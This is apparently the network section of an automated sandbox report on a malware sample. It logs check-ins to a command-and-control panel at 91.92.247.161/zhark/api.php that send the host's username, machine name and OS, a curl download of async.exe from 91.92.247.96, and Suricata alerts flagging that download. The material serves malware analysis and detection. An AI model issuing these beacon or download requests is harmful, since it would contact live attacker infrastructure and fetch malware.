Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
GET
200
http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
REQUEST
RESPONSE
BODY
GET /zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 91.92.247.161
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 07 Dec 2023 02:44:31 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 49
Content-Type: text/html; charset=UTF-8
GET
200
http://91.92.247.96/async.exe
REQUEST
RESPONSE
BODY
GET /async.exe HTTP/1.1
User-Agent: curl/1.0
Host: 91.92.247.96
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 07 Dec 2023 02:44:32 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 06 Dec 2023 17:32:10 GMT
ETag: "21fc00-60bdabb25fa3c"
Accept-Ranges: bytes
Content-Length: 2227200
Content-Type: application/x-msdownload
GET
200
http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B&tsk=29
REQUEST
RESPONSE
BODY
GET /zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B&tsk=29 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 91.92.247.161
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 07 Dec 2023 02:44:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 4
Content-Type: text/html; charset=UTF-8
GET
200
http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
REQUEST
RESPONSE
BODY
GET /zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 91.92.247.161
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 07 Dec 2023 02:45:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 4
Content-Type: text/html; charset=UTF-8
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 1.1.1.1 | 192.168.56.103 | 0 | abcdefghijklmnopqrstuvwabcdefghi |
| 1.1.1.1 | 192.168.56.103 | 0 | abcdefghijklmnopqrstuvwabcdefghi |
| 1.1.1.1 | 192.168.56.103 | 0 | abcdefghijklmnopqrstuvwabcdefghi |
| 1.1.1.1 | 192.168.56.103 | 0 | abcdefghijklmnopqrstuvwabcdefghi |
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49164 -> 91.92.247.96:80 | 2013028 | ET POLICY curl User-Agent Outbound | Attempted Information Leak |
| TCP 192.168.56.103:49164 -> 91.92.247.96:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
| TCP 192.168.56.103:49164 -> 91.92.247.96:80 | 2034567 | ET HUNTING curl User-Agent to Dotted Quad | Potentially Bad Traffic |
| TCP 91.92.247.96:80 -> 192.168.56.103:49164 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 91.92.247.96:80 -> 192.168.56.103:49164 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts